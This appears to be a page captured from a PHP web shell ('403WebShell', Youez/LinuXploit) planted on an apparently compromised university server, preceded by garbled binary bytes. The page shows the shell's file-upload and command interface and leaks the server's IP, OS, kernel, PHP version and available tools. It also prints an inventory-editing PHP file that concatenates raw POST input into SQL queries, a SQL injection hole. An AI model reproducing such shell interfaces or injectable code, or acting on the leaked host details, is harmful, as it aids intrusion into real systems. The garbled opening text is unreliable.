h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5801/root/var/www/html/hardware/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/5801/root/var/www/html/hardware/pages/hardware_edit_db.php
<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header_staff.php';?>

<?php
function MonthThai($strMonth)
{
	$strMonthName = Array("","มกราคม","กุมภาพันธ์","มีนาคม","เมษายน","พฤษภาคม","มิถุนายน","กรกฎาคม","สิงหาคม","กันยายน","ตุลาคม","พฤศจิกายน","ธันวาคม");
	$strMonthThai=$strMonthName[$strMonth];
	return $strMonthThai;
}

if ($_POST["submit"])
{
  $assetcode = (isset($_POST["assetcode"])) ? $_POST["assetcode"] : '';
  $status_code1 = (isset($_POST["status_code1"])) ? $_POST["status_code1"] : '';
  $loc = (isset($_POST["loc"])) ? $_POST["loc"] : '';
  $hall = (isset($_POST["hall"])) ? $_POST["hall"] : '';
  $spec = (isset($_POST["spec"])) ? $_POST["spec"] : '';
  $note = (isset($_POST["note"])) ? $_POST["note"] : '';
  $sid = (isset($_POST["sid"])) ? $_POST["sid"] : '';
  $Page = (isset($_POST["Page"])) ? $_POST["Page"] : '';
  $txtKeyword = (isset($_POST["txtKeyword"])) ? $_POST["txtKeyword"] : '';
  $status_code = (isset($_POST["status_code"])) ? $_POST["status_code"] : '';
  $text205 = (isset($_POST["text205"])) ? $_POST["text205"] : '';
  $sqlx = "SELECT * FROM hardware_mis WHERE assetcode='" . $assetcode . "'";
  $queryx = mysqli_query($conn,$sqlx);	
  if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC)) { 	
			//บันทึกลงในตาราง hardware_mis
			$sql = "UPDATE hardware_mis ";
			$sql .= "SET status_code=" . $status_code . ",";
			$sql .= "text205='" . $text205 . "',";
			$sql .= "note='" . $note . "',";
			$sql .= "spec='" . $spec . "' ";
			$sql .= " WHERE assetcode='" . $assetcode . "'";
			$query = mysqli_query($conn,$sql);
			if($query) {
?>							
	<!--<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="index_staff.php?sid=<?php //echo $sid;?>&Page=<?php //echo $Page;?>&txtKeyword=<?php //echo $txtKeyword;?>"><button type="button" class="btn-success">คลิกที่นี่เพื่อกลับหน้ารายการ</button></a>-->
<?php				
				//echo "บันทึกข้อมูลแล้ว";
				if($status_code1<>"") {
					$redirect_url = "status.php?status_code1=" . $status_code1 . "&Page=" . $Page;
					header("location:$redirect_url");
				} else if ($loc<>"") { //if($status_code1<>"")
					$redirect_url = "location.php?loc=" . $loc . "&Page=" . $Page;
					header("location:$redirect_url");
				} else if ($hall<>"") { //if($status_code1<>"")
					$redirect_url = "index_staff_all.php?hall=" . $hall . "&Page=" . $Page . "&assetcode=" . $assetcode . "#" . $assetcode;;
					header("location:$redirect_url");					
				} else { //if($status_code1<>"")
					$redirect_url = "index_staff.php?assetcode=" . $assetcode . "&sid=" . $sid . "&Page=" . $Page . "&txtKeyword=" . $txtKeyword . "#" . $assetcode;
					header("location:$redirect_url");				
				} //if($status_code1<>"")
			} else { //if($query) {
				//echo "ไม่สามารถบันทึกข้อมูลได้";
?>
	<font color="#FF0000">
	<h1>ไม่สามารถบันทึกข้อมูลได้</h1>
	<h2>กรุณาเลือกสถานะครุภัณฑ์ และสถานที่ตั้ง/จัดเก็บ</h2>
	</font>
	<a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
			} //if($query) {	

  } else { //if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC))
  	//echo "ไม่พบข้อมูล";
?>
	<h1><font color="#FF0000">ไม่พบข้อมูล</font></h1>
	<a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
  } //if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC))
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit